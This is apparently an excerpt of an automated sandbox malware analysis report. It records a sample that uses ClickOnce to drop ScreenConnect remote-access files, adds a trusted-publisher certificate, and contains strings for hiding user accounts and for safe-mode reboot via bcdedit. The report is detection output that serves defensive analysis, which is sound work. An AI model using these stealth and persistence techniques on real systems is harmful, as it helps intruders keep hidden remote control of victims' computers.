                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C194D2A5 pushad ; iretd 1_2_00007FF9C194D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6845E push eax; ret 1_2_00007FF9C1A6846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6842E pushad ; ret 1_2_00007FF9C1A6845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A67D00 push eax; retf 1_2_00007FF9C1A67D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A600BD pushad ; iretd 1_2_00007FF9C1A600C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A7845E push eax; ret 8_2_00007FF9C1A7846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A7842E pushad ; ret 8_2_00007FF9C1A7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A62E40 pushad ; ret 8_2_00007FF9C1A62E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A78071 pushad ; retf 8_2_00007FF9C1A7809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A630B2 pushad ; iretd 8_2_00007FF9C1A630B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D5B055 push eax; ret 8_2_00007FF9C1D5B089
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
